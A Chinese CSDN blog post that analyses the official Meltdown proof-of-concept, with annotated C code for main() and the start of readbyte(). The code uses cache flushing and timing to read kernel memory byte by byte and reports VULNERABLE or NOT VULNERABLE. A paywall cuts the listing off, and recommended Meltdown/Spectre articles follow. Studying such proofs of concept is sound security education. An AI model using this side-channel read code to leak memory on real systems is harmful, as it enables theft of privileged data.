meltdown官方POC原理分析和踩过的坑

最新推荐文章于 2022-12-18 22:12:28 发布
最新推荐文章于 2022-12-18 22:12:28 发布
阅读量715 收藏 3
点赞数
文章标签: meltdown spectre
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44749339/article/details/103038671
版权
本文详细分析了meltdown漏洞的官方Proof-of-Concept(POC),从main函数开始,逐步探讨关键函数的工作原理。重点在于理解如何利用缓存侧信道技术读取内存中的敏感数据。文中还分享了在理解POC过程中遇到的难点和解决思路,并提供了完整的官方代码以供参考。
摘要由CSDN通过智能技术生成

meltdown summary

先从main函数开始看

在这里int main(int argc, char *argv[])
{
   
	int ret, fd, i, score, is_vulnerable;
	unsigned long addr, size;
	static char expected[] = "%s version %s";

	progname = argv[0];
	if (argc < 3)
		return usage();

	if (sscanf(argv[1], "%lx", &addr) != 1)
		return usage();

	if (sscanf(argv[2], "%lx", &size) != 1)
		return usage();

	memset(target_array, 1, sizeof(target_array));//将target-array数组值全部置为一

	ret = set_signal();
	pin_cpu0();

	set_cache_hit_threshold();//设置 cache hit 阈值

	fd = open("/proc/version", O_RDONLY);//open函数,打开路径,  readonly ,成功则返回文件描述符,否则返回 -1 , /proc/version系统调用将内核信息版本返回给函数
	if (fd < 0) {
   
		perror("open");
		return -1;
	}

	for (score = 0, i = 0; i < size; i++) {
   //循环遍历所有字符
		ret = readbyte(fd, addr);//ret是很重要(超级重要)的返回值,readbyte函数也是该代码核心
		if (ret == -1)
			ret = 0xff;
		printf("read %lx = %x %c (score=%d/%d)\n",//%x是以16进制输出整型数据,%lx就是以16进制输出长整型数据
		       addr, ret, isprint(ret) ? ret : ' ',//?就是判断的意思,true就输出:前面的,false就是后面的
		       ret != 0xff ? hist[ret] : 0,
		       CYCLES);

		if (i < sizeof(expected) &&
		    ret == expected[i])
			score++;

		addr++;
	}

	close(fd);

	is_vulnerable = score > min(size, sizeof(expected)) / 2;

	if (is_vulnerable)
		fprintf(stderr, "VULNERABLE\n");
	else
		fprintf(stderr, "NOT VULNERABLE\n");

	exit(is_vulnerable);
}插入代码片

开始看看重要函数

在这里插入代码片int readbyte(int fd, unsigned long addr)
{
   
	int i, ret = 0, max = -1, maxi = -1;
	static char buf[256];

	memset(hist, 0, sizeof(hist));//将hist参数全部设为0

	for (i = 0; i < CYCLES; i++) {
   
		ret = pread(fd, buf, sizeof(buf), 0);//,将fd读入到buf array中,成功ret=返回的字节数。
		if (ret < 0) {
   
			perror("pread");
			break;
		}

		clflush_target();//Flush阶段,就是将target array在cache清空

		_mm_mfence
最低0.47元/天 解锁文章
weixin_44749339
关注
X86 CPU 漏洞 Meltdown 原理及google攻击代码
chen1540524015的博客
08-25 1752
meltdown的原理其实很简单了,访问一个虚拟地址要走page table walk, 现在一般都是4级页表了,页的属性中有一位标志是区分是内核页还是用户页的。程序执行在用户模式下是不允许访问内核地址的原因就是,用户态使用用户态下的页完成虚拟地址向物理地址的转换,同理内核态使用内核态的页。那好了,meltdown发生的窗口期就是因为乱序执行,当用户态非法访问一个内核态的地址时,还没来得及做页属性...
Meltdown漏洞分析
a74147的博客
04-24 911
Meltdown attack、fixed……
首发:Meltdown漏洞分析与实践
zdy0_2004的专栏
01-07 3376
转自:https://mp.weixin.qq.com/s?__biz=MzI3MTUxOTYyMA==&mid=2247483941&idx=1&sn=e846a19b766b32b05a0acd8c041c0333&chksm=eac1d8ceddb651d82ba5303315f3575dc90438d2802be947e68d91061da02c0c89db5fab25a7&mpshare
宋宝华: meltdown漏洞五分钟视频(原理与案例)
Linux阅码场
02-04 912
背景篇我们读知道CPU的执行模式有特权和非特权之分,在特权模式下,可以访问到尽可能多的硬件资源;在非特权模式之下,很多资源都被限制访问。应用在非特权模式,内核在特权模式,应用要做什么特别的事情,必须通过系统调用陷入到内核。内核为了保护自己,通常把自己的虚拟地址空间,映射为仅仅特权模式可以访问,这样用户态的非特权模式是无法访问内核的数据的。meltdown的恐怖之处在于让非特权模式可以访问到特权模式
首发:最新CPU漏洞Meltdown详细分析
奔跑吧-Linux内核
01-11 3574
2018年的第二天Meltdown和Spectre漏洞在计算机界如同放了一个核弹,IT码农们都炸开了锅,各大厂商的各路大神都在挑灯夜战的做各种测试和打补丁,各路技术爱好者也纷纷在微信群中热烈讨论漏洞的技术问题和研读论文。 本文是猫王大神(Xiao Grangrong)同学花了一个周末时间,参考了各路的论文和资料撰写出来,希望对喜欢技术的各位朋友能有一丁点的帮助,感谢猫王大神的精彩文章。
Meltdown & Spectre原理简要梳理
热门推荐
会打代码的扫地王大爷的专栏
02-23 2万+
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Spectre以及meltdown漏洞是前段时间,十分热门的两个漏洞,它们之所以广受重视,是因为它们根据的是体系结构的设计漏洞,而非针对某个系统或者某个软件,因此它几乎可以遍及大多数近代的CPU。 这里主要有三个漏洞: - Variant 1: bounds check bypass (CVE-20...
处理器A 级漏洞Meltdown(熔毁)和Spectre(幽灵)分析报告1 ... - 安天实验室1
08-04
《处理器A级漏洞Meltdown(熔毁)和Spectre(幽灵)分析报告》 在2018年1月,安天实验室发布了关于处理器重大安全漏洞——Meltdown(熔毁)和Spectre(幽灵)的分析报告。这两个漏洞对全球云计算基础设施构成了严重威胁...
MeltdownSpectreScanner(Meltdown和Spectre漏洞检测工具)v1.0.0.1官方绿色版
08-08
MeltdownSpectreScanner是一款腾讯哈勃漏洞检测工具,是腾讯反病毒实验室哈勃分析系统推出Meltdown和Spectre漏洞检测工具,能帮助用户快速方便的完成漏洞探测,及时发现隐患,将风险降到最低。 基本简介  此次...
CPU漏洞分析——Meltdown与Spectre
08-10
018年1月4日,Jann Horn等安全研究者披露了"Meltdown"(CVE-2017-5754)和"Spectre"(CVE-2017-5753 & CVE-2017-5715)两组CPU特性漏洞。相关漏洞利用了芯片硬件层面执行加速机制的实现缺陷实现侧信道攻击,可以间接通过 CPU 缓存读取系统内存数据,其直接危害是将可能造成CPU运作机制上的信息泄露,低权级的攻击者可以通过漏洞来远程泄露用户信息或本地泄露更高权级的内存信息。笔者对此进行深入研究
[SEEDLabs] Meltdown & Spectre Attack Labs
痛苦实验记录
04-21 3520
系统安全分类下的两个实验,放在一起写。Meltdown 和 Spectre 是两个关于体系结构的漏洞,主要是利用了缓冲延时的侧信道攻击方法。 这次实验用的是官方网站发布的预装环境的Ubuntu16,看官网的说明meltdown的大部分的实验在Ubuntu20上面也可以做,但是还是有不行的,spectre的话是两个版本都可以做,为了方便还是安装了Ubuntu16了。还有需要注意的就是这两个实验都是针对intel的处理器的,如果不是intel处理器的话实验可能不能成功。(我们老师的...
一步一步理解CPU芯片漏洞:Meltdown与Spectre
最新发布
ZP1015
12-18 2237
一个具有用户级权限的攻击者在第三条指令中试图访问内核地址,处理器会对其作安全检查,检查该进程是否有权限访问该地址,于是这条指令会触发异常,该指令及之后的指令对寄存器的修改都会被丢弃,处理器重新回到能正常执行的指令中。在支持乱序执行的CPU中,后面的指令可能在前面指令执行结束前就开始执行了。此后,攻击者就可以通过缓存侧信道攻击,不断遍历加载rbx[al*4096],由于该数据此时已经在缓存中,攻击者总会遍历出一个加载时间远小于其它的数据,推测哪个内存页被访问过了,从而推断出被访问的内核内存数据。
Meltdown 简简述
weixin_34355559的博客
01-07 126
Meltdown 简简述 近日现代 CPU 的 Meltdown & Spectre 漏洞沸沸扬扬,最早是 Google 研究员发现可以通过内存侧信道时序攻击来获取隐私数据,后续 Chromium, Apple 以及 Mozilla 都发文讨论了其对各个平台的影响与应对方案。 网上讨论该漏洞的文章也很多,笔者个人感觉 This ...
Meltdown 论文翻译
zhipingxi的博客
02-10 2299
摘要(Abstract)    The security of computer systems fundamentally relies on memory isolation, e.g., kernel address ranges are marked as non-accessible and are protected from user access. In this paper, w...
POC和EXP脚本
weixin_45007073的博客
01-25 7983
引言 在我们的日常渗透测试中,经常挖掘到一些漏洞,但是我们一般使用挖掘工具或者手工判断的时候,不好确定是不是真的存在这么一个漏洞,因此POC脚本就应运而生了。POC全称是Proof of Concept,中文译作概念验证。它是专门为了验证漏洞是否真的存在的脚本。而EXP全称是Exploit,中文译作漏洞利用程序。它是对POC验证结果的一种漏洞利用脚本。 编程基础 因为市面上有关POC和EXP脚本的教程比较稀少,但是比较明确的是想要写好POC和EXP,一般都要有一些网络编程的基础,python的要会基本的爬虫
小白也可以看懂的PoC容量证明入门(二)
基于容量证明(Proof-of-Capacity, PoC)的数字加密基础设施
09-18 429
小白也可以理解的PoC原理 PoC的本质,用一个普通人也可以理解的话说,就是用硬盘挖矿。没错,PoW是用CPU(或者显卡、ASIC矿机,他们的本质都是更强的计算芯片,与CPU本质上是一样的)挖矿、PoS是凭借持币比例挖矿,DPoS是根据投票决定超级节点,而PoC就是凭借硬盘挖矿。 我们可以这么理解: ->在PoW里是谁的芯片计算快、谁就容易挖到矿; ->在PoS里是谁持币多,谁就容易挖...
Spectre侧信道攻击过程验证【头歌教学实践平台】
m0_64587776的博客
10-31 791
头歌教学实践平台——Spectre侧信道攻击过程验证 Spectre漏洞是2017年被发现并于2018年1月份被公开披露的一个处理器A级漏洞,涉及CVE编号CVE-2017-5754。该漏洞出现的根源在于当前CPU为了提高运行效率而使用的一种优化机制——预测执行,该机制的目的在于提前准备好计算结果和内存数据等,确保CPU需要该数据被能够被立即获取。利用该漏洞,攻击者可以突破进程间的隔离和用户间的隔离,窃取其他进程或用户的数据,漏洞影响涉及Intel、AMD、ARM等主流的处理器,覆盖从个人电脑到云服务器等
宋宝华: 用代码切身实践体会meltdown漏洞
Linux阅码场
01-08 4318
本文是我在Ubuntu 14.04上面进行的meltdown漏洞的亲测。meltdown漏洞,使得我们可以在用户空间读到内核空间的数据,做越权访问。我感觉每天YY看技术文章,而不去亲自试验,总是无法切身体会,因此我们来把它实例化,直接写代码看效果!本文暂时不涉及技术细节,只贴相关的代码。详细的原理,希望后面有机会再叙述。文章中涉及到的所有代码,我都放在了我的github上面:https://git
cpu spectre 幽灵 漏洞 突破内存独立性限制 简介
whatday的专栏
05-08 492
本文对上述漏洞(主要是Spectre)进行了分析,并对PoC进行调试和解读,希望可以给想要了解这次CPU漏洞事件的小伙伴一个指引。 加速,再加速 计算机依据冯诺依曼体系,基于存储程序控制原理,每条指令依次执行。这个过程是很完美的一个闭环,每条指令的执行过程也是依次进行的,有条不紊,从更新PC开始,依次取指令、分析指令、执行指令。这个过程就是这样反复进行着,计算机运行也没有什么问题,唯一的问题就是这个过程太慢了。 为了解决这个问题,现代计算机采取的优化思路有流水线化设计和高速缓存(cache,其实...
Meltdown攻击:突破内存隔离的安全威胁
"《Meltdown攻击_白皮书》由Moritz Lipp、Michael Schwarz、Daniel Gruss等人撰写,详细阐述了Meltdown攻击原理及其对内存隔离安全性的破坏。Meltdown利用现代处理器乱序执行的副作用,能够读取任意内核内存位置,...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值